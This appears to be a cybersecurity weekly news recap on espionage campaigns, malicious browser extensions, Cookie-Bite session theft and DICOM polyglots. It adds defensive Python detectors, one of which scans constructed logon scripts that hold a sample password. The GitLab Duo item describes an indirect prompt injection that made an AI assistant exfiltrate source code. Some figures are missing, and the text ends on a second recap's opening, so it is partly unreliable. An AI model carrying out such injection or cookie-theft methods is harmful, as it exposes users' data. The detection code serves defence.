    Chinese Threat Actors Exploit Ivanti EPMM Flaws — The China-nexus cyber espionage group tracked as UNC5221 has been attributed to the exploitation of a pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software to target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The intrusions leverage the vulnerabilities to obtain a reverse shell and drop malicious payloads like KrustyLoader, which is known to deliver the Sliver command-and-control framework. "UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components for covert data exfiltration," EclecticIQ said. "Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization."
    Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code. Links to these browser add-ons are hosted on specially crafted sites to which users are likely redirected via phishing and social media posts. While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Several of these extensions have been taken down by Google.
    CISA Warns SaaS Providers of Attacks Targeting Cloud Environments — The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned that SaaS companies are under threat from bad actors who are on the prowl for cloud applications with default configurations and elevated permissions. While the agency did not attribute the activity to a specific group, the advisory said enterprise backup platform Commvault is monitoring cyber threat activity targeting applications hosted in its Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault's Microsoft 365 backup software-as-a-service solution, hosted in Azure," CISA said. "This provided the threat actors with unauthorized access to Commvault's customers' M365 environments that have application secrets stored by Commvault."
    GitLab AI Coding Assistant Flaws Could Be Used to Inject Malicious Code — Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence assistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. The attack could also leak confidential issue data, such as zero-day vulnerability details. All that's required is for the attacker to get the chatbot to interact with a merge request, taking advantage of the fact that GitLab Duo has extensive access to the platform. "By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo's behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes," Legit Security said. One variation of the attack involved hiding a malicious instruction in an otherwise legitimate piece of source code, while another exploited the way Duo parses markdown responses asynchronously, in real time. Because Duo begins rendering its output line by line rather than waiting until the entire response is generated, an attacker could introduce malicious HTML that accesses sensitive data and exfiltrates it to a remote server before the response is complete. The issues have been patched by GitLab following responsible disclosure.

    Trending CVEs
    Software vulnerabilities remain one of the simplest—and most effective—entry points for attackers. Each week uncovers new flaws, and even small delays in patching can escalate into serious security incidents. Staying ahead means acting fast. Below is this week's list of high-risk vulnerabilities that demand attention. Review them carefully, apply updates without delay, and close the doors before they're forced open.
    This week's list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027, CVE-2025-30911, CVE-2024-57273, CVE-2024-54780, CVE-2024-54779, CVE-2025-41229, CVE-2025-4322, CVE-2025-47934, CVE-2025-30193, CVE-2025-0993, CVE-2025-36535, CVE-2025-47949, CVE-2025-40775, CVE-2025-20152, CVE-2025-4123, CVE-2025-5063, CVE-2025-37899, CVE-2025-26817, CVE-2025-47947, CVE-2025-3078, CVE-2025-3079, and CVE-2025-4978.
    Around the Cyber World

    Sandworm Drops New Wiper in Ukraine — The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. "The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it deployed the ZEROLOT wiper in Ukraine. For this, the attackers abused Active Directory Group Policy in the affected organizations," ESET Director of Threat Research, Jean-Ian Boutin, said. Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox.
    Signal Says No to Recall — Signal has released a new version of its messaging app for Windows that, by default, blocks the ability of Windows to use Recall to periodically take screenshots of the app. "Although Microsoft made several adjustments over the past twelve months in response to critical feedback, the revamped version of Recall still places any content that's displayed within privacy-preserving apps like Signal at risk," Signal said. "As a result, we are enabling an extra layer of protection by default on Windows 11 in order to help maintain the security of Signal Desktop on that platform even though it introduces some usability trade-offs. Microsoft has simply given us no other option." Microsoft began officially rolling out Recall last month.
    Russia Introduces New Law to Track Foreigners Using Their Smartphones — The Russian government has introduced a new law that makes installing a tracking app mandatory for all foreign nationals in the Moscow region. The app gathers their real-time location, fingerprints, a facial photograph, and residential information. "The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said. "If migrants change their actual place of residence, they will be required to inform the Ministry of Internal Affairs within three working days." A proposed four-year trial period begins on September 1, 2025, and runs until September 1, 2029.
    Dutch Government Passes Law to Criminalize Cyber Espionage — The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies. Under the amended law, leaking sensitive information that is not classified as a state secret or engaging in activities on behalf of a foreign government that harm Dutch interests can also result in criminal charges. "Foreign governments are also interested in non-state-secret, sensitive information about a particular economic sector or about political decision-making," the government said. "Such information can be used to influence political processes, weaken the Dutch economy or play allies against each other. Espionage can also involve actions other than sharing information."
    Microsoft Adds Quantum-Resistant Algorithms to SymCrypt — Microsoft has revealed that it's making post-quantum cryptography (PQC) capabilities, including ML-KEM and ML-DSA, available to Windows Insiders (Canary Channel Build 27852 and higher) and on Linux (SymCrypt-OpenSSL version 1.9.0). "This advancement will enable customers to commence their exploration and experimentation of PQC within their operational environments," Microsoft said. "By obtaining early access to PQC capabilities, organizations can proactively assess the compatibility, performance, and integration of these novel algorithms alongside their existing security infrastructure."
    New Malware DOUBLELOADER Uses ALCATRAZ for Obfuscation — The open-source obfuscator ALCATRAZ has been seen within a new generic loader dubbed DOUBLELOADER, which has been deployed alongside Rhadamanthys Stealer infections since December 2024. The malware collects host information, requests an updated version of itself, and starts beaconing to a hardcoded IP address stored within the binary. "Obfuscators such as ALCATRAZ end up increasing the complexity when triaging malware," Elastic Security Labs said. "Its main goal is to hinder binary analysis tools and increase the time of the reverse engineering process through different techniques; such as hiding the control flow or making decompilation hard to follow."
    New Formjacking Campaign Targets WooCommerce Sites — Cybersecurity researchers have detected a sophisticated formjacking campaign targeting WooCommerce sites. The malware, per Wordfence, injects a fake but professional-looking payment form into legitimate checkout processes and exfiltrates sensitive customer data to an external server. Further analysis has revealed that the infection likely originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via the Simple Custom CSS and JS plugin, a plugin that lets administrators add custom code. "Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site's design and payment workflow, making it particularly difficult for site owners and users to detect," the WordPress security company said. "The malware author repurposed the browser's localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page."

    E.U. Sanctions Stark Industries — The European Union has announced sanctions against 21 individuals and six entities in Russia over its "destabilising actions" in the region. One of the sanctioned entities is Stark Industries, a bulletproof hosting provider that has been accused of acting as an "enabler of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber attacks against the Union and third countries." The sanctions also target its CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries was previously spotlighted by independent cybersecurity journalist Brian Krebs, who detailed its use in DDoS attacks in Ukraine and across Europe. In August 2024, Team Cymru said it had discovered 25 Stark-assigned IP addresses used to host domains associated with FIN7 activity and that it had been working with Stark Industries for several months to identify and reduce abuse of its systems. The sanctions also target Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming in the Baltic states and disrupting civil aviation.
    The Mask APT Unmasked as Tied to the Spanish Government — The mysterious threat actor known as The Mask has been identified as run by the Spanish government, according to a report published by TechCrunch, citing people who worked at Kaspersky at the time and had knowledge of the investigation. The Russian cybersecurity company first exposed the hacking group in 2014, linking it to highly sophisticated attacks since at least 2007 against high-profile organizations such as governments, diplomatic entities, and research institutions. A majority of the group's attacks have targeted Cuba, followed by hundreds of victims in Brazil, Morocco, Spain, and Gibraltar. While Kaspersky has not publicly attributed it to a specific country, the latest revelation makes The Mask one of the few Western government hacking groups ever discussed in public, alongside the Equation Group, the Lamberts, and Animal Farm.
    Social Engineering Scams Target Coinbase Users — Earlier this month, cryptocurrency exchange Coinbase revealed that unknown threat actors had bribed customer support agents in India to breach its systems and siphon funds from nearly 70,000 customers. According to blockchain security firm SlowMist, Coinbase users have been targeted by social engineering scams since the start of the year, bombarded with SMS messages about fake withdrawal requests that ask for their confirmation, as part of a "sustained and organized scam campaign." The goal is to create a false sense of urgency and trick victims into calling a number, eventually convincing them to transfer funds to a "secure" wallet whose seed phrase was pre-generated by the attackers, who then drain the assets. It's assessed that the activity is primarily carried out by two groups: low-level skid attackers from the Com community and organized cybercrime groups based in India. "Using spoofed PBX phone systems, scammers impersonate Coinbase support and claim there's been 'unauthorized access' or 'suspicious withdrawals' on the user's account," SlowMist said. "They create a sense of urgency, then follow up with phishing emails or texts containing fake ticket numbers or 'recovery links.'"
    Delta Can Sue CrowdStrike Over July 2024 Mega Outage — Delta Air Lines, which had its systems crippled and almost 7,000 flights canceled in the wake of the massive outage caused by a faulty CrowdStrike update in mid-July 2024, has been given the green light to pursue its lawsuit against the cybersecurity company. A judge in the U.S. state of Georgia ruled that Delta can try to prove CrowdStrike was grossly negligent in pushing a defective update for its Falcon software to customers. The update crashed 8.5 million Windows devices around the world. CrowdStrike previously claimed that the airline had rejected technical support offers from both itself and Microsoft. In a statement shared with Reuters, lawyers representing CrowdStrike said they were "confident the judge will find Delta's case has no merit, or will limit damages to the 'single-digit millions of dollars' under Georgia law." The development comes months after MGM Resorts International agreed to pay million to settle multiple class-action lawsuits related to a data breach in 2019 and a ransomware attack the company experienced in 2023.
    Storm-1516 Uses AI-Generated Media to Spread Disinformation — The Russian influence operation known as Storm-1516sought to spread narratives that undermined the European support for Ukraine by amplifying fabricated stories on X about European leaders using drugs while traveling by train to Kyiv for peace talks. One of the posts was subsequently shared by Russian state media and Maria Zakharova, a senior official in Russia's foreign ministry, as part of what has been described as a coordinated disinformation campaign by EclecticIQ. The activity is also notable for the use of synthetic content depicting French President Emmanuel Macron, U.K. Labour Party leader Keir Starmer, and German chancellor Friedrich Merz of drug possession during their return from Ukraine. "By attacking the reputation of these leaders, the campaign likely aimed to turn their own voters against them, using influence operationsto reduce public support for Ukraine by discrediting the politicians who back it," the Dutch threat intelligence firm said.
    Turkish Users Targeted by DBatLoader — AhnLab has disclosed details of a malware campaign that's distributing a malware loader called DBatLoadervia banking-themed banking emails, which then acts as a conduit to deliver SnakeKeylogger, an information stealer developed in .NET. "The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processesthrough techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processesfor behaviors such as file copying and changing policies," the company said.
    SEC SIM-Swapper Sentenced to 14 Months for SEC X Account Hack — A 26-year-old Alabama man, Eric Council Jr., has been sentenced to 14 months in prison and three years of supervised release for using SIM swapping attacks to breach the U.S. Securities and Exchange Commission'sofficial X account in January 2024 and falsely announced that the SEC approved BitcoinExchange Traded Funds. Council Jr.was arrested in October 2024 and pleaded guilty to the crime earlier this February. He has also been ordered to forfeit According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account."
    FBI Warns of Malicious Campaign Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) is warning of a campaign, ongoing since April 2025, in which malicious actors impersonate senior U.S. federal or state government officials and their contacts to target individuals. "The malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior US official in an effort to establish rapport before gaining access to personal accounts," the FBI said. "One way the actors gain such access is by sending targeted individuals a malicious link under the guise of transitioning to a separate messaging platform." From there, the actor may deliver malware or introduce hyperlinks that lead targets to an actor-controlled site that steals login information.
    DICOM Flaw Enables Attackers to Embed Malicious Code Within Medical Image Files — Praetorian has released a proof-of-concept (PoC) for a high-severity security flaw in Digital Imaging and Communications in Medicine (DICOM), the predominant file format for medical images, that enables attackers to embed malicious code within legitimate medical image files. CVE-2019-11687, originally disclosed in 2019 by Markel Picado Ortiz, stems from a design decision that allows arbitrary content in the 128-byte preamble at the start of the file, which enables the creation of malicious polyglots: a single file that is at once a valid DICOM image and a valid executable. Codenamed ELFDICOM, the PoC extends the attack surface to Linux environments, making it a much more potent threat. As a mitigation, it's advised to implement a DICOM preamble whitelist. "DICOM's file structure inherently allows arbitrary bytes at the beginning of the file, where Linux and most operating systems will look for magic bytes," Praetorian researcher Ryan Hennessee said. "[A whitelist] would check a DICOM file's preamble before it is imported into the system. This would allow known good patterns, such as 'TIFF' magic bytes, or '\x00' null bytes, while files with the ELF magic bytes would be blocked."
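    The preamble whitelist Praetorian recommends is small enough to show in full. The following is an added example written for this recap, not Praetorian's ELFDICOM PoC or any vendor's import hook: it accepts only preambles that match an allow list (all nulls, or a TIFF header) and rejects everything else, naming the executable format when it recognises one. The allow list, the extra PE ("MZ") check for Windows, and the sample files are assumptions made for the demonstration.

```python
"""Added example (not Praetorian's code): allow-list check on a DICOM Part 10 preamble.

A Part 10 file begins with a 128-byte preamble the standard leaves unconstrained,
followed by the 4-byte prefix b"DICM". Because those 128 bytes may hold anything,
an ELF header dropped there turns the file into a polyglot: a viewer sees a valid
image, the Linux loader sees an executable. Instead of blocklisting bad magics,
the check accepts only known-good preambles and blocks the rest.
Assumed for this demo: the allow list, the PE check and the sample files.
"""
from dataclasses import dataclass

PREAMBLE_LEN = 128
DICM_PREFIX = b"DICM"

# Known-good preamble prefixes (assumed allow list; tune to the modalities you own).
ALLOWED_PREFIXES = {
    "null": b"\x00" * PREAMBLE_LEN,  # the common case: an empty preamble
    "tiff-le": b"II*\x00",           # little-endian TIFF header
    "tiff-be": b"MM\x00*",           # big-endian TIFF header
}

# Executable magics worth naming in the verdict. ELF is what ELFDICOM abuses; the
# PE entry goes beyond the page, since the same trick works against Windows loaders.
EXECUTABLE_MAGICS = {"ELF": b"\x7fELF", "PE": b"MZ"}


@dataclass(frozen=True)
class Verdict:
    allowed: bool
    reason: str


def check_preamble(data: bytes) -> Verdict:
    """Return whether `data` (the head of a file) carries an allow-listed DICOM preamble."""
    if len(data) < PREAMBLE_LEN + len(DICM_PREFIX):
        return Verdict(False, "too short to be a DICOM Part 10 file")
    preamble = data[:PREAMBLE_LEN]
    prefix = data[PREAMBLE_LEN:PREAMBLE_LEN + len(DICM_PREFIX)]
    if prefix != DICM_PREFIX:
        return Verdict(False, "no DICM prefix at offset 128")
    for fmt, magic in EXECUTABLE_MAGICS.items():
        if preamble.startswith(magic):
            return Verdict(False, f"preamble carries {fmt} executable header")
    for name, good in ALLOWED_PREFIXES.items():
        if preamble.startswith(good):
            return Verdict(True, f"preamble matches allow-listed pattern '{name}'")
    return Verdict(False, "preamble is not on the allow list")


def build_part10(preamble: bytes) -> bytes:
    """Constructed minimal Part 10 header: preamble, DICM, one file-meta element.

    The element is (0002,0010) Transfer Syntax UID = Explicit VR Little Endian,
    enough for the check; no pixel data is included.
    """
    assert len(preamble) == PREAMBLE_LEN
    element = b"\x02\x00\x10\x00" + b"UI" + b"\x14\x00" + b"1.2.840.10008.1.2.1\x00"
    return preamble + DICM_PREFIX + element


def pad(head: bytes) -> bytes:
    """Pad a preamble fragment to the full 128 bytes with nulls."""
    return head + b"\x00" * (PREAMBLE_LEN - len(head))


# Constructed samples: two benign files and three hostile ones.
SAMPLES = {
    "clean.dcm": build_part10(pad(b"")),
    "tiff_preamble.dcm": build_part10(pad(b"II*\x00\x08\x00\x00\x00")),
    "elf_polyglot.dcm": build_part10(pad(b"\x7fELF\x02\x01\x01\x00")),
    "pe_polyglot.dcm": build_part10(pad(b"MZ\x90\x00")),
    "no_dicm_prefix.bin": pad(b"") + b"JUNK",
}


def scan(samples: dict[str, bytes] = SAMPLES) -> dict[str, Verdict]:
    """Apply the check to every sample (stand-in for a PACS import hook)."""
    return {name: check_preamble(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan().items():
        print(f"{'ALLOW' if verdict.allowed else 'BLOCK':5} {name}: {verdict.reason}")
```

    Run the check on the first 132 bytes of a file before it reaches the importer; a preamble that is neither empty nor a pattern you have explicitly approved is a defect worth a quarantine, whether or not it happens to start with a magic you recognise.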
    Cookie-Bite Attack Uses Chrome Extension to Steal Session Tokens — Cybersecurity researchers have demonstrated a new attack technique called Cookie-Bite that employs custom-made malicious browser extensions to steal the "ESTSAUTH" and "ESTSAUTHPERSISTENT" session cookies issued by Microsoft Entra ID and bypass multi-factor authentication (MFA). The attack has several moving parts: a custom Chrome extension that monitors authentication events and captures the cookies; a PowerShell script that automates the extension's deployment and ensures persistence; an exfiltration mechanism that sends the cookies to a remote collection point; and a complementary extension that injects the captured cookies into the attacker's browser. "Threat actors often use infostealers to extract authentication tokens directly from a victim's machine or buy them directly through darknet markets, allowing adversaries to hijack active cloud sessions without triggering MFA," Varonis said. "By injecting these cookies while mimicking the victim's OS, browser, and network, attackers can evade Conditional Access Policies and maintain persistent access." Authentication cookies can also be stolen in real time using adversary-in-the-middle (AitM) phishing kits, or by rogue browser extensions that request excessive permissions to interact with web sessions, modify page content, and extract stored authentication data. Once installed, such an extension can access the browser's storage API, intercept network requests, or inject malicious JavaScript into active sessions to harvest session cookies as they are issued. "By leveraging stolen session cookies, an adversary can bypass authentication mechanisms, gaining seamless entry into cloud environments without requiring user credentials," Varonis said. "Beyond initial access, session hijacking can facilitate lateral movement across the tenant, allowing attackers to explore additional resources, access sensitive data, and escalate privileges by abusing existing permissions or misconfigured roles."
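    The defensive angle on Cookie-Bite is that a replayed cookie resumes a session without a fresh interactive sign-in, so the session keeps going from a device that is not the one that authenticated. The following is an added example written for this recap, not Varonis's code: it takes the first interactive sign-in of each session as a baseline and flags later non-interactive events whose IP address, user agent or OS differs. The record fields follow the shape of an Entra ID sign-in log export but are assumptions for the demo, as are the constructed records themselves.

```python
"""Added example (not Varonis's code): detect replayed Entra ID session cookies.

A stolen ESTSAUTH / ESTSAUTHPERSISTENT cookie lets an attacker resume a session
without credentials or MFA, so the interactive sign-in Conditional Access would
evaluate never happens. What does appear is the same session continuing from a
different machine. An attacker who mimics the OS and browser still comes from
their own network, so the IP comparison is the one that usually fires.
Assumed for this demo: the field names and the records below (constructed).
"""
import json
from dataclasses import dataclass

# Constructed JSON-lines sign-in records, in chronological order per session.
SAMPLE_LOG = """\
{"createdDateTime": "2025-05-20T08:00:00Z", "userPrincipalName": "alice@example.com", "sessionId": "S-1", "isInteractive": true, "ipAddress": "203.0.113.10", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64) Chrome/124.0", "operatingSystem": "Windows 10"}
{"createdDateTime": "2025-05-20T08:30:00Z", "userPrincipalName": "alice@example.com", "sessionId": "S-1", "isInteractive": false, "ipAddress": "203.0.113.10", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64) Chrome/124.0", "operatingSystem": "Windows 10"}
{"createdDateTime": "2025-05-20T11:05:00Z", "userPrincipalName": "alice@example.com", "sessionId": "S-1", "isInteractive": false, "ipAddress": "198.51.100.7", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64) Chrome/124.0", "operatingSystem": "Windows 10"}
{"createdDateTime": "2025-05-20T09:00:00Z", "userPrincipalName": "bob@example.com", "sessionId": "S-2", "isInteractive": true, "ipAddress": "203.0.113.22", "userAgent": "Mozilla/5.0 (Macintosh) Safari/17.4", "operatingSystem": "MacOs"}
{"createdDateTime": "2025-05-20T10:00:00Z", "userPrincipalName": "bob@example.com", "sessionId": "S-2", "isInteractive": false, "ipAddress": "203.0.113.22", "userAgent": "Mozilla/5.0 (Macintosh) Safari/17.4", "operatingSystem": "MacOs"}
{"createdDateTime": "2025-05-20T09:30:00Z", "userPrincipalName": "carol@example.com", "sessionId": "S-3", "isInteractive": true, "ipAddress": "203.0.113.30", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64) Edge/124.0", "operatingSystem": "Windows 11"}
{"createdDateTime": "2025-05-20T12:10:00Z", "userPrincipalName": "carol@example.com", "sessionId": "S-3", "isInteractive": false, "ipAddress": "192.0.2.45", "userAgent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/126.0", "operatingSystem": "Linux"}
{"createdDateTime": "2025-05-20T12:20:00Z", "userPrincipalName": "dave@example.com", "sessionId": "S-4", "isInteractive": false, "ipAddress": "203.0.113.40", "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64) Chrome/124.0", "operatingSystem": "Windows 10"}
"""

FINGERPRINT_FIELDS = ("ipAddress", "userAgent", "operatingSystem")


@dataclass
class Alert:
    user: str
    session_id: str
    when: str
    changed: dict  # field -> (baseline value, observed value)


def detect_session_replay(lines) -> list[Alert]:
    """Flag non-interactive sign-ins whose device fingerprint differs from the
    session's most recent interactive sign-in. Input order is assumed to be
    chronological within each session."""
    baselines: dict[str, dict[str, str]] = {}
    alerts: list[Alert] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        sid = rec.get("sessionId")
        if not sid:
            continue  # nothing to correlate on
        fp = {f: rec.get(f, "") for f in FINGERPRINT_FIELDS}
        if rec.get("isInteractive"):
            # A fresh interactive sign-in re-establishes the baseline: the user
            # actually authenticated (and passed Conditional Access) from here.
            baselines[sid] = fp
            continue
        base = baselines.get(sid)
        if base is None:
            continue  # session began before this log window; no baseline to compare
        changed = {f: (base[f], fp[f]) for f in FINGERPRINT_FIELDS if base[f] != fp[f]}
        if changed:
            alerts.append(Alert(rec["userPrincipalName"], sid, rec["createdDateTime"], changed))
    return alerts


def run_demo() -> list[Alert]:
    """Run the heuristic over the constructed records."""
    return detect_session_replay(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for a in run_demo():
        diffs = ", ".join(f"{k}: {v[0]!r} -> {v[1]!r}" for k, v in a.changed.items())
        print(f"[possible cookie replay] {a.user} session {a.session_id} at {a.when}: {diffs}")
```

    Treat a hit as a lead to correlate, not a verdict: a VPN reconnect or a laptop moving between networks changes the IP legitimately. The strong signal is a changed IP combined with no interactive sign-in and, as in the carol record, a user agent or OS that the victim has never used.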

    Cybersecurity Webinars

    Non-Human Identities: The AI Backdoor You're Not Watching → AI agents rely on Non-Human Identities (NHIs) to function—but these are often left untracked and unsecured. As attackers shift focus to this hidden layer, the risk is growing fast. In this session, you'll learn how to find, secure, and monitor these identities before they're exploited. Join the webinar to understand the real risks behind AI adoption—and how to stay ahead.
    Inside the LOTS Playbook: How Hackers Stay Undetected → Attackers are using trusted sites to stay hidden. In this webinar, Zscaler experts share how they detect these stealthy living-off-trusted-sites (LOTS) attacks using insights from the world's largest security cloud. Join to learn how to spot hidden threats and improve your defense.

    Cybersecurity Tools

    ScriptSentry → It is a free tool that scans your environment for dangerous logon script misconfigurations—like plaintext credentials, insecure file/share permissions, and references to non-existent servers. These overlooked issues can enable lateral movement, privilege escalation, or even credential theft. ScriptSentry helps you quickly identify and fix them across large Active Directory environments.
    Aftermath → It is a Swift-based, open-source tool for macOS incident response. It collects forensic data—like logs, browser activity, and process info—from compromised systems, then analyzes it to build timelines and track infection paths. Deploy via MDM or run manually. Fast, lightweight, and ideal for post-incident investigation.
    AI Red Teaming Playground Labs → It is an open-source training suite with hands-on challenges designed to teach security professionals how to red team AI systems. Originally developed for Black Hat USA 2024, the labs cover prompt injections, safety bypasses, indirect attacks, and Responsible AI failures. Built on Chat Copilot and deployable via Docker, it's a practical resource for testing and understanding real-world AI vulnerabilities.
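    The two checks behind the ScriptSentry item are easy to reason about once written down. The following is an added example for this recap, not ScriptSentry's own code: it tokenises `net use` commands in logon scripts to find inline passwords and compares every UNC host against a host inventory. The scripts, the inventory and the simplification that a bare token after the UNC path is a password are assumptions for the demo; real `net use` syntax has more switches than are handled here.

```python
"""Added example (not ScriptSentry's code): two logon-script checks on constructed scripts.

Domain logon scripts run on every workstation at sign-in, so a `net use` line
carrying a password hands that credential to everyone who can read NETLOGON, and a
UNC path to a host that no longer exists is a name an attacker can register or
spoof to receive those connections. Assumed for this demo: the scripts, the host
inventory and the parsing rule for passwords.
"""
import re
from dataclasses import dataclass
from typing import Optional

UNC_RE = re.compile(r"\\\\([A-Za-z0-9_.-]+)\\")
NET_USE_RE = re.compile(r"^\s*net\s+use\s+(.*)$", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    script: str
    line_no: int
    kind: str  # "plaintext-credential" or "dangling-server"
    detail: str


def inline_password(args: str) -> Optional[str]:
    """Return the password token from `net use` arguments, if one is present.

    Syntax: net use [drive:] \\\\server\\share [password | *] [/user:...] [/switches]
    A token right after the UNC path that is neither a switch nor "*" (which
    prompts interactively) is an inline password.
    """
    tokens = args.split()
    for i, tok in enumerate(tokens):
        if tok.startswith("\\\\") and i + 1 < len(tokens):
            nxt = tokens[i + 1]
            if not nxt.startswith("/") and nxt != "*":
                return nxt
    return None


def scan_script(name: str, text: str, known_hosts: set[str]) -> list[Finding]:
    """Scan one script; `known_hosts` must already be lower-cased."""
    findings: list[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = NET_USE_RE.match(line)
        if m and inline_password(m.group(1)) is not None:
            user = re.search(r"/user:(\S+)", line, re.IGNORECASE)
            who = user.group(1) if user else "<current user>"
            findings.append(Finding(name, n, "plaintext-credential",
                                    f"password for {who} embedded in net use"))
        for host in dict.fromkeys(UNC_RE.findall(line)):  # de-duplicate, keep order
            if host.lower() not in known_hosts:
                findings.append(Finding(name, n, "dangling-server",
                                        f"\\\\{host} is not in the host inventory"))
    return findings


# Constructed inventory and scripts (not from any real domain).
KNOWN_HOSTS = {"fs01", "fs01.corp.example", "print01"}

SAMPLE_SCRIPTS = {
    "logon.bat": "\n".join([
        "@echo off",
        "net use H: \\\\fs01\\home$ /persistent:no",
        "net use P: \\\\print01\\queue",
        "net use S: \\\\fs01\\finance Summer2024! /user:CORP\\svc_finance",
        "net use T: \\\\oldfs\\public * /user:CORP\\%USERNAME%",
        "xcopy \\\\oldfs\\tools\\*.* C:\\tools\\ /y",
    ]),
    "mapdrives.bat": "net use Z: \\\\FS01.corp.example\\share",
}


def scan_all(scripts=SAMPLE_SCRIPTS, known_hosts=KNOWN_HOSTS) -> list[Finding]:
    """Scan every script against the inventory."""
    lowered = {h.lower() for h in known_hosts}
    out: list[Finding] = []
    for name, text in scripts.items():
        out.extend(scan_script(name, text, lowered))
    return out


if __name__ == "__main__":
    for f in scan_all():
        print(f"{f.script}:{f.line_no} [{f.kind}] {f.detail}")
```

    In the constructed scripts the scanner reports the embedded service-account password on line 4 and the two references to the retired `oldfs` host on lines 5 and 6; the `*` on line 5 is not a credential, and `FS01.corp.example` matches the inventory case-insensitively. In a real environment the inventory would come from Active Directory computer objects or DNS rather than a literal set.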

    Tip of the Week
    Review and Revoke Old OAuth App Permissions — They're Silent Backdoors → You've likely logged into apps using "Continue with Google," "Sign in with Microsoft," or GitHub/Twitter/Facebook logins. That's OAuth. But did you know many of those apps still have access to your data long after you stop using them?
    Why it matters:
    Even if you delete the app or forget it existed, it might still have ongoing access to your calendar, email, cloud files, or contact list — no password needed. If that third party gets breached, your data is at risk.
    What to do:

    Go through your connected apps here:
    Google: myaccount.google.com/permissions
    Microsoft: account.live.com/consent/Manage
    GitHub: github.com/settings/applications
    Facebook: facebook.com/settings?tab=applications

    Revoke anything you don't actively use. It's a fast, silent cleanup — and it closes doors you didn't know were open.
    Conclusion
    Looking ahead, it's not just about tracking threats—it's about understanding what they reveal. Every tactic used, every system tested, points to deeper issues in how trust, access, and visibility are managed. As attackers adapt quickly, defenders need sharper awareness and faster response loops.
    The takeaways from this week aren't just technical—they speak to how teams prioritize risk, design safeguards, and make choices under pressure. Use these insights not just to react, but to rethink what "secure" really needs to mean in today's environment.

    ⚡ Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs
    Cyber threats don't show up one at a time anymore. They're layered, planned, and often stay hidden until it's too late. For cybersecurity teams, the key isn't just reacting to alerts—it's spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today's complex systems, we need focused analysis—not noise. What you'll see here isn't just a list of incidents, but a clear look at where control is being gained, lost, or quietly tested.

    ⚡ Threat of the Week

    Lumma Stealer, DanaBot Operations Disrupted — A coalition of private sector companies and law enforcement agencies has taken down the infrastructure associated with Lumma Stealer and DanaBot. Charges have also been unsealed against 16 individuals for their alleged involvement in the development and deployment of DanaBot. The malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information. More unusually, DanaBot has also been used in hacking campaigns that appear to be linked to Russian state-sponsored interests, making it a particularly clear example of commodity malware repurposed by Russian state hackers for their own goals. In tandem, about 2,300 domains that acted as the command-and-control (C2) backbone for the Lumma information stealer have been seized, alongside the takedown of 300 servers and the neutralization of 650 domains used to launch ransomware attacks. The actions against international cybercrime in the past few days constitute the latest phase of Operation Endgame.

    🔔 Top News

    Threat Actors Use TikTok Videos to Distribute Stealers — While ClickFix has become a popular social engineering tactic to deliver malware, threat actors have been observed using AI-generated videos uploaded to TikTok to deceive users into running malicious commands on their systems and deploying malware like Vidar and StealC under the guise of activating pirated versions of Windows, Microsoft Office, CapCut, and Spotify. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware," Trend Micro said.
